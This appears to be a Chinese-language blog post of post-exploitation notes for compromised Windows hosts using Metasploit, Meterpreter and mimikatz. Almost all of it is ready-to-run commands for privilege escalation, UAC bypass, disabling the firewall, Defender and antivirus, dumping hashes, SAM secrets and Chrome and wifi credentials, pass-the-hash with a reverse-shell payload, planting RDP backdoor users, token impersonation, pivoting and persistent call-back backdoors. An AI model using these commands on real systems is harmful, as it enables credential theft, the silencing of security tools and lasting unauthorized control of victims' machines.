后渗透流程

权限提升

  • 查看补丁:run post/windows/gather/enum_patches

windows内核提权

  • ms_15_051_client_copy_image(windows7 x64&x86 || win2008R2 SP1 x64)
  • ms14_058_track_popup_menu(Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164)
  • ms10_015_kitrap0d (Windows Server 2003,Windows Server 2008,Windows7)
  • ms10_092_schelevator(Windows Vista,Windows7,Windows Server2008x64和x86)
  • ms16_016_webdav(Windows7 SP1 x86)
  • ppr_flatten_rec(Windows XP SP3,Windows2003SP1和Windows7SP1)
  • ms13_053_ schlamperei(Windows7 SP1x86)
  • ms16_032_secondary_logon_handle_privesc(Windows7-10,Windows Server2008和2012,32位和64)

msf模块提权

  • MSF模块(Exploit/windows/local/ask)
    缺点:需要uac交互

绕过UAC(MSF模块)

  • Exploit/windows/local/bypassuac
  • Exploit/windows/local/bypassuac_injection
  • Exploit/windows/local/bypassuac_vbs

进程迁移

  • ps
  • getpid
  • migrate [id] (id为迁移的进程号)
  • run post/windows/manage/migrate(自动迁移)

关闭防火墙及杀毒软件

-关闭防火墙(shell)

- `Netsh advfirewall set allprofiles state off`(管理员及以上权限)
  • 添加防火墙规则

    • netsh firewall set portopening TCP 3389 ENABLE(开放3389端口,不关闭防火墙)
    • netsh firewall set portopening tcp 23 telnet enable custom 192.168.1.105(允许IP 192.168.1.105通过Telnet访问主机:)
    • netsh firewall set portopening TCP 445 ENABLE (打开445端口)
    • netsh firewall set allowedprogram C:\A.exe A ENABLE (添加程序C盘下的A.exe并放行)
  • 关闭Denfender(shell)

    • Net stop windefend
  • 关闭DEP(shell)

    • Bcdedit.exe /set {current} nx AlwaysOff
  • 关闭杀毒软件(meterpreter)

    • Run killav
    • Run post/windows/manage/killava

后渗透信息收集

msf模块(post)

  • 获取目标主机的分区情况:post/windows/gather/forensics/enum_drives
  • 判断是否为虚拟机:
    post/windows/gather/checkvm
  • 开启了哪些服务:
    post/windows/gather/enum_applications
  • 查看共享:
    post/windows/gather/enum_shares
  • 获取主机最近的系统操作:
    post/windows/gather/dumplinks
  • 查看补丁:
    post/windows/gather/enum_applicationsenum_patches
  • scraper脚本
    路径:/usr/share/metasploit-framework/scripts/meterpreter

(meterpreter下run scraper)

保存信息的目录:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx

  • winenum脚本(meterpreter下run winenum)

获取文件或密码

  • vpn密码mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
  • wifi密码netsh wlan export profile interface=无线网络连接 key=clear folder=C:\
  • 读取chrome cookies: `mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultcookies /unprotect" exit
    mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultUSERDA~1" exit

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultLOGIND~1" exit //读chrome密码`

数据包抓获

目的:抓获与外围的交互
使用地点:找不到进入内网的方法(主机在防火墙,开放端口少,是服务器的子网)

抓包

sniffer会过滤掉自身merterpreter产生的流量,直接去抓取和主机相关的数据包信息

  • 加载sniffer:load sniffer
  • 查看网卡信息;sniffer_interfaces
  • 开启监听:sniffer_start 1
  • 导出数据包:sniffer_dump 1 1.cap

解包

  • auxiliary/sniffer/psnuffle
  • meterpreter模块

    • run packetrecorder
    • run post/windows/manage/rpcapd_start

抓hash

基础:密码格式:
用户名称:RID:LM-HASH值:NT-HASH值

获取hash值

  • hashdump
  • run post/windows/gather/smart_hashdump

    • 检查权限和系统类型
    • 检查是否是域控制服务器
    • 从注册表读取hash,注入lsass进程
    • 如果是08server并且具有管理员权限,直接getsystem尝试提权
    • 如果是win7且UAC关闭并具有管理员权限,从注册表读取
    • 03/XP直接getsystem,从注册表读取hash
  • mimikatz(已集合到mimikatz)

    • load mimikatz
    • mimikatz_command -f privilege::debug
    • mimikatz_command -f sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话)
    • sekurlsa::ekeys #获取kerberos加密凭证

hash破解

  • Hashcat

文章:
https://www.anquanke.com/post/id/177123

  • hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

hash传递攻击

UAC注册表:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System

进shell,中文乱码,输入chcp 65001
shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

  • MSF
  • exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128
set RHOST 192.168.206.101
set SMBUser administrator
set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0
exploit

  • mimikkatz
    sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

远程桌面

  • 开启远程桌面

    • run post/windows/manage/enable_rdp(方式一)
    • run getgui -e (方式二)

run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt

(关闭远程桌面)
  • 开启远程桌面并添加新用户

    • run getgui -u root -p pass
  • 开启远程桌面并绑定在8888端口

    • run getgui -e -f 8888
  • 截图

    • load espia
    • screengrab
  • 端口转发

    • portfwd add -l 4444 -p 3389 -r 192.168.85.xxx (将目标机的3389端口转发到本地4444端口)
      //-L 可以指定映射的外网ip
  • 远程桌面连接

    • kali下:rdesktop -u root -p 123 192.168.85.157:port

令牌假冒

  • windows安全相关概念

    • session
    • Windows Station
    • Desktop
    • Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限
  • incognito

    • load incognito (加载模块)
    • list_tokens -u (查看可用的token)
      (非交互的token多出来一条EA\Administrator)
    • impersonate_token EA\\Administrator
    • 成功登陆

跳板攻击

  • pivoting

    • 利用已经被入侵的主机作为跳板来攻击网络中其他系统
    • 访问由于路由问题而不能直接访问的内网系统
  • 添加路由

    • 方式一:run autoroute -s 192.168.102.0/24
    • 方式二:run post/multi/manage/autoroute(更新)
    • 利用win7攻击内网服务器
    • 扫描内网网络

      • run post/windows/gather/arp_scanner rhosts=192.168.102.0/24
      • use auxiliary/scanner/portscan/tcp

ProxyChains代理设置

  • 配置:vim /etc/proxychain.conf(加上ip)
  • Socket代理

    • auxiliary/server/socks4a
  • ProxyChains

    • ProxyChains是为GUNLinux操作系统而开发的工具,任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。
    • proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx

后门植入

  • meterpreter后门: Metsvc

    • 通过服务启动
    • run metsvc -A #设定端口,上传后门文件
  • meterpreter后门:persistence

    • 通过启动型启动
    • 特性:定期会连,系统启动时回连,自动运行
    • run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111
最后修改:2019 年 12 月 10 日 09 : 14 PM
如果觉得我的文章对你有用,请随意赞赏